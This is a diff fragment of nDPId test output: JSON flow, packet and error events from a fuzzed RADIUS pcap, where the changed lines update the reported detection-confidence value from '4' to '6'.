01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1528996990566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996990566,"pkt":"AAAMB6xAABRP+4rqCABFAALbIN1AAP8Rqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1528996990648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528996990648,"pkt":"ABRP+4rqcNuYVcUnCABFAACFzqFAAPwRhYTG4hk1CgxAHgcVclAAcSboBSEAaT3FxpV5xYvpMtB7xhdyjsUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhOS5tbmNwODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgJWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjEx"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":9472,"global_ts_msec":1528996997052} 00709{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":9472,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528996996859,"pkt":"ABRP+4rqcNuYVcUnJQBFAAE4+6JAAPwRV9jG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00620{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1528996068129,"flow_last_seen":1528996996859,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10905,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1528996068129,"flow_last_seen":1528996996859,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10905,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050,"global_ts_msec":1528997003303} 00608{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2050,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997003122,"pkt":"ABRP+4rqcNuYVcUnCAJFAADh+7RAAPwRWBXG4hk1CgxAHgcUchAAzbxOCyQAxZ9vEHep5UhYAk0ZSBfGW2ABNTAzMTE0ODAwcjM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0ODQvZjA6Nzk6NjA6ZDE6N2Q6MjcvMjE1WEoBAgBIFwEAAAEFAAD\/dHhHt8FXBaLd\/Dz8eGsAAgUAALtgmvoL3QAA9ON0yrW1Z\/uLAQACCwUAACkdfnJp8UtH8QraekvpDSFQErTrf98odpcx7aFbGWQ5MZk="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997012338} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997012137,"pkt":"ABRP+4rqcNuYVcUnCABFAIEw++ZAAPwRV5TG4hk1CgxAHgcUchABHA0JAicBFBsdKAWbpXDSR2MuOEvDRI4aCwAAV8gbBVNQQxpuAAABNxA0owm4HCG6PU2XNAkv\/vzDOB0KCSSyhii6vunR59O76CIKGOYjAfl7PUhdXq\/+IyUA1AERNOgzhBq9cBFTORk8iq5zOGawlRK5SmrzC9CE14BmLSTx9+rzUr5gcK7nljeTYDH3Q7JtAU4wMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNCUALm12YzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNDg0L2YwOjc5OjYwOmQxOjdkOjM3LzIxNVkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJln13lrCrLxGDT3fIxBMmg"} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528997012137,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528997012137,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997023243} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997020091,"pkt":"AAAMB6xAABRP+4rqCAAHAALbIOZAAP8RAAAKDEAexuIZNXIQBxQC1gAAASoCn1lLG5tNeGgoWBAiZw18BtkaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICVZXSVNQUjEwGgkAADghDQMyNwZbIqSfATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997023501,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -85,13 +85,13 @@ 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":19456,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997030088,"pkt":"AAAMB6xAABRP+4rqTABFAALbIOpAAP8RAAC2DEAexuIZNXIQBxQCxwAAAS4Cv3+VaWYldnjLTxY8VfGmtUsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqStATUwMzExNDh\/MjgxNTAxNTg5QHdsYW4ubW5jNDgwLm0jYzMxMS4zZ3Bwbm10d29yay5vcmdZAxB+CDVjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODBtODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXPTTGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAKLIDwMxGgoAAFfIEAROShoRAABXyBELTHluamh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1528997046661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997046661,"pkt":"ABRP+4rqcNuYVcUnCABFAACl\/GdAAPwRV57G4hk1SgxAHgcUchAAkRD9CzAAiXzLxBwubl1wwfS6AWnHLCcBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NCU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEsknsuWEL1cn0K6nAa77dv0="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1528997046798,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997046798,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIO1AAP8RAAAKDEAexuJNNXIQBxQClwAAATECjwe2IRDkqP0tMlR6xA\/iWasaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgsAADghDQM0NwZbIqS2ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtJQAtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxn2FjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2BAbsFAEQIA5WWldDOlRlc3RMSWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAAAIFwwAMRoUAABXyAcOVqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 